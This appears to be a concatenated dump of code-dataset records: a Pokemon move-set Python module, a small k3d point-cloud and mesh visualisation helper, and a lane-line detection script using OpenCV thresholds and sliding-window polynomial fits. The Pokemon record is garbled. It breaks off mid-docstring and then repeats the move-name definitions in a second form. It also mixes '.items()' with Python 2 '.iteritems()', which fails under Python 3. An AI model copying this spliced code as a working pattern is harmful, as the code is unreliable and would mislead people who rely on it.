SELF_DESTRUCT,\n\t\"SHARPEN\": SHARPEN,\n\t\"SING\": SING,\n\t\"SKULL_BASH\": SKULL_BASH,\n\t\"SKY_ATTACK\": SKY_ATTACK,\n\t\"SLAM\": SLAM,\n\t\"SLASH\": SLASH,\n\t\"SLEEP_POWDER\": SLEEP_POWDER,\n\t\"SLUDGE\": SLUDGE,\n\t\"SMOG\": SMOG,\n\t\"SMOKESCREEN\": SMOKESCREEN,\n\t\"SOFT_BOILED\": SOFT_BOILED,\n\t\"SOLAR_BEAM\": SOLAR_BEAM,\n\t\"SONIC_BOOM\": SONIC_BOOM,\n\t\"SPIKE_CANNON\": SPIKE_CANNON,\n\t\"SPLASH\": SPLASH,\n\t\"SPORE\": SPORE,\n\t\"STOMP\": STOMP,\n\t\"STRENGTH\": STRENGTH,\n\t\"STRING_SHOT\": STRING_SHOT,\n\t\"STRUGGLE\": STRUGGLE,\n\t\"STUN_SPORE\": STUN_SPORE,\n\t\"SUBMISSION\": SUBMISSION,\n\t\"SUBSTITUTE\": SUBSTITUTE,\n\t\"SUPERSONIC\": SUPERSONIC,\n\t\"SUPER_FANG\": SUPER_FANG,\n\t\"SURF\": SURF,\n\t\"SWIFT\": SWIFT,\n\t\"SWORDS_DANCE\": SWORDS_DANCE,\n\t\"TACKLE\": TACKLE,\n\t\"TAIL_WHIP\": TAIL_WHIP,\n\t\"TAKE_DOWN\": TAKE_DOWN,\n\t\"TELEPORT\": TELEPORT,\n\t\"THRASH\": THRASH,\n\t\"THUNDER\": THUNDER,\n\t\"THUNDERBOLT\": THUNDERBOLT,\n\t\"THUNDER_PUNCH\": THUNDER_PUNCH,\n\t\"THUNDER_SHOCK\": THUNDER_SHOCK,\n\t\"THUNDER_WAVE\": THUNDER_WAVE,\n\t\"TOXIC\": TOXIC,\n\t\"TRANSFORM\": TRANSFORM,\n\t\"TRI_ATTACK\": TRI_ATTACK,\n\t\"TWINEEDLE\": TWINEEDLE,\n\t\"VICE_GRIP\": VICE_GRIP,\n\t\"VINE_WHIP\": VINE_WHIP,\n\t\"WATERFALL\": WATERFALL,\n\t\"WATER_GUN\": WATER_GUN,\n\t\"WHIRLWIND\": WHIRLWIND,\n\t\"WING_ATTACK\": WING_ATTACK,\n\t\"WITHDRAW\": WITHDRAW,\n\t\"WRAP\": WRAP}\n\n
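# Illustrative check (added sketch; not in the original source): every per-type\n# dictionary below is simply a filtered view of MOVE_SET, e.g.\n#   all(v[\"ELEMENT_TYPE\"] == \"FIRE\" for v in FIRE_TYPE_MOVE_SET.values())\n# evaluates to True once the module is loaded.\n\n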
\"\"\"Dictionary containing the moves for Bug type Pokemon.\"\"\"\n\nBUG_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"BUG\"}\n\n\"\"\"Dictionary containing the moves for Dark type Pokemon.\"\"\"\n\nDARK_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"DARK\"}\n\n\"\"\"Dictionary containing the moves for Dragon type Pokemon.\"\"\"\n\nDRAGON_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"DRAGON\"}\n\n\"\"\"Dictionary containing the moves for Electric type Pokemon.\"\"\"\n\nELECTRIC_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"ELECTRIC\"}\n\n\"\"\"Dictionary containing the moves for Fairy type Pokemon.\"\"\"\n\nFAIRY_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"FAIRY\"}\n\n\"\"\"Dictionary containing the moves for Fighting type Pokemon.\"\"\"\n\nFIGHTING_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"FIGHTING\"}\n\n\"\"\"Dictionary containing the moves for Fire type Pokemon.\"\"\"\n\nFIRE_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"FIRE\"}\n\n\"\"\"Dictionary containing the moves for Flying type Pokemon.\"\"\"\n\nFLYING_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"FLYING\"}\n\n\"\"\"Dictionary containing the moves for Ghost type Pokemon.\"\"\"\n\nGHOST_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.items() \n\tif v[\"ELEMENT_TYPE\"] == \"GHOST\"}\n\n\"\"\"Dictionary containing the moves for Grass type 
Pokemon.\"\"\"\n\nGRASS_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"GRASS\"}\n\n\"\"\"Dictionary containing the moves for Ground type Pokemon.\"\"\"\n\nGROUND_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"GROUND\"}\n\n\"\"\"Dictionary containing the moves for Ice type Pokemon.\"\"\"\n\nICE_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"ICE\"}\n\n\"\"\"Dictionary containing the moves for Normal type Pokemon.\"\"\"\n\nNORMAL_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"NORMAL\"}\n\n\"\"\"Dictionary containing the moves for Poison type Pokemon.\"\"\"\n\nPOISON_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"POISON\"}\n\n\"\"\"Dictionary containing the moves for Psychic type Pokemon.\"\"\"\n\nPSYCHIC_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"PSYCHIC\"}\n\n\"\"\"Dictionary containing the moves for Rock type Pokemon.\"\"\"\n\nROCK_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"ROCK\"}\n\n\"\"\"Dictionary containing the moves for Steel type Pokemon.\"\"\"\n\nSTEEL_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"STEEL\"}\n\n\"\"\"Dictionary containing the moves for Water type Pokemon.\"\"\"\n\nWATER_TYPE_MOVE_SET = { \n\tk: v for (k,v) in MOVE_SET.iteritems() \n\tif v[\"ELEMENT_TYPE\"] == \"WATER\"}\n\n\"\"\"Tuple containing strings of Pokemon moves.\n\nNames are generated from initialised names. Requires Pokemon move is defined in Move Set dictionary.\n\"\"\"\n\nMOVE_NAMES = tuple(\n\tdict.keys(MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Bug type Pokemon.\"\"\"\n\nBUG_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(BUG_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Dark type Pokemon.\"\"\"\n\nDARK_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(DARK_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Dragon type Pokemon.\"\"\"\n\nDRAGON_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(DRAGON_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Electric type Pokemon.\"\"\"\n\nELECTRIC_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(ELECTRIC_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Fairy type Pokemon.\"\"\"\n\nFAIRY_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FAIRY_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Fighting type Pokemon.\"\"\"\n\nFIGHTING_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FIGHTING_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Fire type Pokemon.\"\"\"\n\nFIRE_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FIRE_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Flying type Pokemon.\"\"\"\n\nFLYING_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(FLYING_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Ghost type Pokemon.\"\"\"\n\nGHOST_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(GHOST_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Grass type Pokemon.\"\"\"\n\nGRASS_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(GRASS_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Ground type Pokemon.\"\"\"\n\nGROUND_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(GROUND_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves for Ice type Pokemon.\"\"\"\n\nICE_TYPE_MOVE_NAMES = tuple(\n\tdict.keys(ICE_TYPE_MOVE_SET))\n\n\"\"\"Tuple containing strings of moves 
\"\"\"Tuple containing strings of moves for Bug type Pokemon.\"\"\"\n\nBUG_TYPE_MOVE_NAMES = tuple(BUG_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Dark type Pokemon.\"\"\"\n\nDARK_TYPE_MOVE_NAMES = tuple(DARK_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Dragon type Pokemon.\"\"\"\n\nDRAGON_TYPE_MOVE_NAMES = tuple(DRAGON_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Electric type Pokemon.\"\"\"\n\nELECTRIC_TYPE_MOVE_NAMES = tuple(ELECTRIC_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Fairy type Pokemon.\"\"\"\n\nFAIRY_TYPE_MOVE_NAMES = tuple(FAIRY_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Fighting type Pokemon.\"\"\"\n\nFIGHTING_TYPE_MOVE_NAMES = tuple(FIGHTING_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Fire type Pokemon.\"\"\"\n\nFIRE_TYPE_MOVE_NAMES = tuple(FIRE_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Flying type Pokemon.\"\"\"\n\nFLYING_TYPE_MOVE_NAMES = tuple(FLYING_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Ghost type Pokemon.\"\"\"\n\nGHOST_TYPE_MOVE_NAMES = tuple(GHOST_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Grass type Pokemon.\"\"\"\n\nGRASS_TYPE_MOVE_NAMES = tuple(GRASS_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Ground type Pokemon.\"\"\"\n\nGROUND_TYPE_MOVE_NAMES = tuple(GROUND_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Ice type Pokemon.\"\"\"\n\nICE_TYPE_MOVE_NAMES = tuple(ICE_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Normal type Pokemon.\"\"\"\n\nNORMAL_TYPE_MOVE_NAMES = tuple(NORMAL_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Poison type Pokemon.\"\"\"\n\nPOISON_TYPE_MOVE_NAMES = tuple(POISON_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Psychic type Pokemon.\"\"\"\n\nPSYCHIC_TYPE_MOVE_NAMES = tuple(PSYCHIC_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Rock type Pokemon.\"\"\"\n\nROCK_TYPE_MOVE_NAMES = tuple(ROCK_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Steel type Pokemon.\"\"\"\n\nSTEEL_TYPE_MOVE_NAMES = tuple(STEEL_TYPE_MOVE_SET.keys())\n\n\"\"\"Tuple containing strings of moves for Water type Pokemon.\"\"\"\n\nWATER_TYPE_MOVE_NAMES = tuple(WATER_TYPE_MOVE_SET.keys())\n\n\"\"\"String generated from the required keys for Pokemon moves.\"\"\"\n\nMOVE_SET_KEYS_STRS = \" \".join([\n\t\"ELEMENT_TYPE\",\n\t\"ATTRIBUTES\",\n\t\"CATEGORY\",\n\t\"POWER\", \n\t\"ACCURACY\",\n\t\"POWER_POINTS\",\n\t\"DESCRIPTION\"])\n\n######################\n### Module classes ###\n######################\n\nclass Generate (namedtuple(\"Props\", MOVE_SET_KEYS_STRS)):\n\t\"\"\"Generates move properties for a defined Pokemon move.\"\"\"\n\n\tdef __new__(cls, pokemon_move):\n\t\t\"\"\"Inherit constants for class from named tuple Props.\n\t\t\n\t\tAnticipated to be consumed in Pokemon base type class constructor. \n\t\t\"\"\"\n\n\t\t\"\"\"\n\t\t>>> import pokemon_moves\n\t\t>>> pokemon_moves.Generate(\"DOUBLE EDGE\")\n\n\t\tProps(\n\t\t\tELEMENT_TYPE='NORMAL', \n\t\t\tATTRIBUTES=Props(\n\t\t\t\tGHOST=GhostTypeMeta(\n\t\t\t\t\tEFFECT='NO_EFFECT', \n\t\t\t\t\tSUM=0), \n\t\t\t...), \n\t\t\tCATEGORY='PHYSICAL', \n\t\t\tPOWER=120, \n\t\t\tACCURACY=100, \n\t\t\tPOWER_POINTS=15, \n\t\t\tDESCRIPTION='User receives recoil damage.')\n\t\t\"\"\"\n\n\t\t# Named arguments #\n\n\t\t# @parameter: pokemon_move, @type: str, @required: yes\n\t\t# @description: Pokemon move to generate properties for.\n\n\t\t# set pokemon move argument as an uppercase string for comparisons and collections.\n\t\tpokemon_move = str(pokemon_move).upper()\n\n\t\t# substitute whitespace characters with underscores.\n\t\tpokemon_move = re.sub(r'\s', '_', pokemon_move)\n\n\t\t# confirm pokemon move is a defined move; otherwise select a move at random.\n\t\tpokemon_move = pokemon_move if pokemon_move in MOVE_NAMES else random.choice(MOVE_NAMES)\n\n\t\t# return: @type: @class.__main__.Generate\n\t\treturn super(Generate, cls).__new__(cls, **MOVE_SET[pokemon_move])\n\n######################\n### Module exports ###\n######################\n\n\"\"\"Generate constants from defined properties. Overwrites previous properties.\n\nComposed to consume existing declarations.\n\"\"\"\n\n# Set module properties: one package-level constant per name defined in the move sets.\nfor name in MOVE_NAMES:\n\tsetattr(sys.modules[__name__], name, Generate(name))","sub_path":"temp/pokemon_moves.py","file_name":"pokemon_moves.py","file_ext":"py","file_size_in_byte":45397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
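# --- Illustrative usage sketch for the pokemon_moves record above (assumes
# the module is importable as `pokemon_moves`; nothing here is part of the
# original dataset record) ---
#   import pokemon_moves
#   move = pokemon_moves.Generate("double edge")     # normalised to "DOUBLE_EDGE"
#   print(move.POWER, move.ACCURACY)                 # -> 120 100
#   fallback = pokemon_moves.Generate("not a move")  # a random defined move instead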
 +{"seq_id":"21697381","text":"import k3d\nimport numpy as np\nimport trimesh\n\n\ndef visualize_pointcloud(point_cloud, point_size=0.05, colors=None, flip_axes=False, name='point_cloud'):\n plot = k3d.plot(name=name, grid_visible=False)\n if flip_axes:\n point_cloud[:, 2] = point_cloud[:, 2] * -1\n point_cloud[:, [0, 1, 2]] = point_cloud[:, [0, 2, 1]]\n plt_points = k3d.points(positions=point_cloud.astype(np.float32), point_size=point_size, colors=colors if colors is not None else [], color=0xd0d0d0)\n plot += plt_points\n plt_points.shader = '3d'\n return plot.display()\n\n\ndef visualize_mesh(mesh, flip_axes=False):\n vertices = mesh.vertices\n faces = mesh.faces\n plot = k3d.plot(name='points', grid_visible=False, grid=(-0.55, -0.55, -0.55, 0.55, 0.55, 0.55))\n if flip_axes:\n vertices[:, 2] = vertices[:, 2] * -1\n vertices[:, [0, 1, 2]] = vertices[:, [0, 2, 1]]\n plt_mesh = k3d.mesh(vertices.astype(np.float32), faces.astype(np.uint32), color=0xd0d0d0)\n plot += plt_mesh\n plt_mesh.shader = '3d'\n plot.display()","sub_path":"util/visualization_utils.py","file_name":"visualization_utils.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"335821982","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nfrom moviepy.editor import VideoFileClip\nimport glob\n\n# Define a class to receive the characteristics of each line detection\n\n\nclass Line():\n def __init__(self):\n # was the line detected in the last iteration?\n self.detected = False\n # x values of the last n fits of the line\n self.recent_xfitted = []\n # average x values of the fitted line over the last n iterations\n self.bestx = None\n # polynomial coefficients averaged over the last n iterations\n self.best_fit = None\n # polynomial coefficients for the most recent fit\n self.current_fit = [np.array([False])]\n # radius of curvature of the line in some units\n self.radius_of_curvature = None\n # distance in meters of vehicle center from the line\n self.line_base_pos = None\n # difference in fit coefficients between last and new fits\n self.diffs = np.array([0, 0, 0], dtype='float')\n # x values for detected line pixels\n self.allx = None\n # y values for detected line pixels\n self.ally = None\n\n\ndef fit_poly(img_shape, leftx, lefty, rightx, righty):\n # Fit a second order polynomial to each lane with np.polyfit()\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n # Generate x and y values for plotting\n ploty = np.linspace(0, img_shape[0]-1, img_shape[0])\n # Calculate both polynomials using ploty, left_fit and right_fit\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n\n return left_fit, right_fit, left_fitx, right_fitx, ploty\n\n\ndef search_around_poly(binary_warped, left_fit, right_fit):\n # HYPERPARAMETER\n # Choose the width of the margin around the previous polynomial to search\n # (100 px is a reasonable default; tune as needed)\n margin = 100\n
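 # Note (added, descriptive): restricting the search to +/- margin around the\n # previous frame's fit avoids re-running the full sliding-window search on\n # every frame; it assumes the lane moves little between consecutive frames.\n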
and y from pixels space to meters\n ym_per_pix = 30/720 # meters per pixel in y dimension\n xm_per_pix = 3.7/700 # meters per pixel in x dimension\n\n # Grab activated pixels\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n\n ### TO-DO: Set the area of search based on activated x-values ###\n ### within the +/- margin of our polynomial function ###\n ### Hint: consider the window areas for the similarly named variables ###\n ### in the previous quiz, but change the windows to our new search area ###\n left_lane_inds = ((nonzerox > (left_fit[0]*(nonzeroy**2) + left_fit[1]*nonzeroy +\n left_fit[2] - margin)) & (nonzerox < (left_fit[0]*(nonzeroy**2) +\n left_fit[1]*nonzeroy + left_fit[2] + margin)))\n right_lane_inds = ((nonzerox > (right_fit[0]*(nonzeroy**2) + right_fit[1]*nonzeroy +\n right_fit[2] - margin)) & (nonzerox < (right_fit[0]*(nonzeroy**2) +\n right_fit[1]*nonzeroy + right_fit[2] + margin)))\n\n # Again, extract left and right line pixel positions\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n\n # Fit new polynomials\n left_fit, right_fit, left_fitx, right_fitx, ploty = fit_poly(\n binary_warped.shape, leftx, lefty, rightx, righty)\n # Fit new polynomials (in the real world)\n left_fit_cr, right_fit_cr, left_fitx_cr, right_fitx_cr, ploty_cr = fit_poly(\n binary_warped.shape, leftx * xm_per_pix, lefty * ym_per_pix, rightx * xm_per_pix, righty * ym_per_pix)\n\n # Define y-value where we want radius of curvature\n # We'll choose the maximum y-value, corresponding to the bottom of the image\n y_eval = np.max(ploty)\n\n # Calculation of R_curve (radius of curvature)\n left_curverad = (\n (1 + (2*left_fit[0]*y_eval + left_fit[1])**2)**1.5) / np.absolute(2*left_fit[0])\n right_curverad = (\n (1 + (2*right_fit[0]*y_eval + right_fit[1])**2)**1.5) / np.absolute(2*right_fit[0])\n # Calculation of R_curve (radius of curvature in the real world)\n left_curverad_real = (\n (1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0])\n right_curverad_real = (\n (1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0])\n\n ## Visualization ##\n # Create an image to draw on and an image to show the selection window\n out_img = np.dstack((binary_warped, binary_warped, binary_warped))*255\n window_img = np.zeros_like(out_img)\n # Color in left and right line pixels\n out_img[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n out_img[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n\n # Generate a polygon to illustrate the search window area\n # And recast the x and y points into usable format for cv2.fillPoly()\n left_line_window1 = np.array(\n [np.transpose(np.vstack([left_fitx-margin, ploty]))])\n left_line_window2 = np.array([np.flipud(np.transpose(np.vstack([left_fitx+margin,\n ploty])))])\n left_line_pts = np.hstack((left_line_window1, left_line_window2))\n right_line_window1 = np.array(\n [np.transpose(np.vstack([right_fitx-margin, ploty]))])\n right_line_window2 = np.array([np.flipud(np.transpose(np.vstack([right_fitx+margin,\n ploty])))])\n right_line_pts = np.hstack((right_line_window1, right_line_window2))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(window_img, np.int_([left_line_pts]), (0, 255, 0))\n cv2.fillPoly(window_img, np.int_([right_line_pts]), (0, 255, 0))\n result = 
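The two curvature expressions above are the textbook radius formula R = (1 + (2Ay + B)^2)^(3/2) / |2A| for a lane modelled as x = Ay^2 + By + C, evaluated at the bottom of the frame; a small self-contained check on a synthetic parabola (all values illustrative):

import numpy as np

A, B, C = 3e-4, -0.2, 300.0                      # a gently curving synthetic lane
ploty = np.linspace(0, 719, 720)
fitx = A * ploty**2 + B * ploty + C

fit = np.polyfit(ploty, fitx, 2)                 # recovers approximately [A, B, C]
y_eval = np.max(ploty)                           # image bottom, as in the code above
curverad = (1 + (2*fit[0]*y_eval + fit[1])**2)**1.5 / np.absolute(2*fit[0])
print(round(curverad), "pixels")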
cv2.addWeighted(out_img, 1, window_img, 0.3, 0)\n\n    # Plot the polynomial lines onto the image\n    plt.plot(left_fitx, ploty, color='yellow')\n    plt.plot(right_fitx, ploty, color='yellow')\n    ## End visualization steps ##\n\n    return result, left_curverad, right_curverad, left_curverad_real, right_curverad_real, left_fit, right_fit\n\n\ndef binary_warped_generate(image):\n    # pipeline() takes LAB/LUV thresholds and warp() returns (warped, M, Minv).\n    c_b, thresholded_binary = pipeline(\n        image, lab_b_thresh=(145, 200), luv_l_thresh=(215, 255))\n    warped_thresholded_binary, M, Minv = warp(thresholded_binary)\n    return warped_thresholded_binary\n\n\ndef warp(img):\n    img_size = (img.shape[1], img.shape[0])\n\n    # Four source coordinates\n    src = np.float32([[593, 450], [690, 450], [200, 720], [1120, 720]])\n\n    # Four desired coordinates\n    dst = np.float32([[200, 0], [1000, 0], [200, 720], [1000, 720]])\n\n    # Compute the perspective transform, M\n    M = cv2.getPerspectiveTransform(src, dst)\n\n    # Could compute the inverse also by swapping the input parameters\n    Minv = cv2.getPerspectiveTransform(dst, src)\n\n    # Create warped image - use linear interpolation\n    warped = cv2.warpPerspective(img, M, img_size, flags=cv2.INTER_LINEAR)\n\n    return warped, M, Minv\n\n\ndef hls_thresh(img, channel='s', thresh=(0, 255)):\n    hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n    if channel == 'h':\n        channel = hls[:, :, 0]\n    elif channel == 'l':\n        channel = hls[:, :, 1]\n    else:\n        channel = hls[:, :, 2]\n    binary_output = np.zeros_like(channel)\n    binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n    return binary_output\n\n\ndef lab_thresh(img, channel='l', thresh=(0, 255)):\n    lab = cv2.cvtColor(img, cv2.COLOR_RGB2LAB)\n    if channel == 'l':\n        channel = lab[:, :, 0]\n    elif channel == 'a':\n        channel = lab[:, :, 1]\n    else:\n        channel = lab[:, :, 2]\n    binary_output = np.zeros_like(channel)\n    binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n    return binary_output\n\n\ndef luv_thresh(img, channel='l', thresh=(0, 255)):\n    luv = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n    if channel == 'l':\n        channel = luv[:, :, 0]\n    elif channel == 'u':\n        channel = luv[:, :, 1]\n    else:\n        channel = luv[:, :, 2]\n    binary_output = np.zeros_like(channel)\n    binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n    return binary_output\n\n\ndef rgb_thresh(img, channel='r', thresh=(0, 255)):\n    rgb = img\n    if channel == 'r':\n        channel = rgb[:, :, 0]\n    elif channel == 'g':\n        channel = rgb[:, :, 1]\n    else:\n        channel = rgb[:, :, 2]\n    binary_output = np.zeros_like(channel)\n    binary_output[(channel > thresh[0]) & (channel <= thresh[1])] = 1\n    return binary_output\n\n\n# Edit this function to create your own pipeline.\ndef pipeline(img, lab_b_thresh=(145, 200), luv_l_thresh=(215, 255)):\n    img = np.copy(img)\n    binary_output_1 = lab_thresh(img, channel='b', thresh=lab_b_thresh)\n    binary_output_2 = luv_thresh(img, channel='l', thresh=luv_l_thresh)\n\n    binary_output = np.zeros_like(binary_output_1)\n    binary_output[(binary_output_1 == 1) | (binary_output_2 == 1)] = 1\n\n    # Stack each channel\n    color_binary = np.dstack(\n        (binary_output_1, binary_output_2, np.zeros_like(binary_output_2))) * 255\n\n    return color_binary, binary_output\n
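The pipeline above ORs a LAB b-channel mask (yellow lines) with a LUV L-channel mask (white lines); the same combination in isolation, run here on a random frame since no test image ships with this record:

import cv2
import numpy as np

img = (np.random.rand(720, 1280, 3) * 255).astype(np.uint8)   # stand-in RGB frame
b = cv2.cvtColor(img, cv2.COLOR_RGB2LAB)[:, :, 2]             # b channel: picks up yellow
l = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)[:, :, 0]             # L channel: picks up white

mask = np.zeros_like(b)
mask[((b > 145) & (b <= 200)) | ((l > 215) & (l <= 255))] = 1  # thresholds from the record
print(mask.sum(), "activated pixels")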
\n\ndef find_lane_pixels(binary_warped):\n    '''\n    Find all the pixels that belong to the left and right lane lines in a\n    binary, perspective-transformed image; return those pixels together with\n    an output image that has the sliding windows drawn on it.\n    '''\n    # Take a histogram of the bottom half of the image\n    histogram = np.sum(binary_warped[binary_warped.shape[0]//2:, :], axis=0)\n    # Create an output image to draw on and visualize the result\n    out_img = np.dstack((binary_warped, binary_warped, binary_warped))\n    # Find the peak of the left and right halves of the histogram\n    # These will be the starting point for the left and right lines\n    midpoint = int(histogram.shape[0]//2)\n    leftx_base = np.argmax(histogram[:midpoint])\n    rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n\n    # HYPERPARAMETERS\n    # Choose the number of sliding windows\n    nwindows = 9\n    # Set the width of the windows +/- margin\n    margin = 100\n    # Set minimum number of pixels found to recenter window\n    minpix = 50\n\n    # Set height of windows - based on nwindows above and image shape\n    window_height = int(binary_warped.shape[0]//nwindows)\n    # Identify the x and y positions of all nonzero pixels in the image\n    nonzero = binary_warped.nonzero()\n    nonzeroy = np.array(nonzero[0])\n    nonzerox = np.array(nonzero[1])\n    # Current positions to be updated later for each window in nwindows\n    leftx_current = leftx_base\n    rightx_current = rightx_base\n\n    # Create empty lists to receive left and right lane pixel indices\n    left_lane_inds = []\n    right_lane_inds = []\n\n    # Step through the windows one by one\n    for window in range(nwindows):\n        # Identify window boundaries in x and y (and right and left)\n        win_y_low = binary_warped.shape[0] - (window+1)*window_height\n        win_y_high = binary_warped.shape[0] - window*window_height\n        win_xleft_low = leftx_current - margin\n        win_xleft_high = leftx_current + margin\n        win_xright_low = rightx_current - margin\n        win_xright_high = rightx_current + margin\n\n        # Draw the windows on the visualization image\n        cv2.rectangle(out_img, (win_xleft_low, win_y_low),\n                      (win_xleft_high, win_y_high), (0, 255, 0), 2)\n        cv2.rectangle(out_img, (win_xright_low, win_y_low),\n                      (win_xright_high, win_y_high), (0, 255, 0), 2)\n\n        # Identify the nonzero pixels in x and y within the window #\n        good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n                          (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n        good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n                           (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]\n\n        # Append these indices to the lists\n        left_lane_inds.append(good_left_inds)\n        right_lane_inds.append(good_right_inds)\n\n        # If you found > minpix pixels, recenter next window on their mean position\n        if len(good_left_inds) > minpix:\n            leftx_current = int(np.mean(nonzerox[good_left_inds]))\n        if len(good_right_inds) > minpix:\n            rightx_current = int(np.mean(nonzerox[good_right_inds]))\n\n    # Concatenate the arrays of indices (previously was a list of lists of pixels)\n    try:\n        left_lane_inds = np.concatenate(left_lane_inds)\n        right_lane_inds = np.concatenate(right_lane_inds)\n    except ValueError:\n        # Avoids an error if the above is not implemented fully\n        pass\n\n    # Extract left and right line pixel positions\n    leftx = nonzerox[left_lane_inds]\n    lefty = nonzeroy[left_lane_inds]\n    rightx = nonzerox[right_lane_inds]\n    righty = nonzeroy[right_lane_inds]\n\n    return leftx, lefty, rightx, righty, out_img\n
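The window search above seeds itself from a column histogram of the bottom half of the frame; that base-finding step, isolated on a synthetic binary image:

import numpy as np

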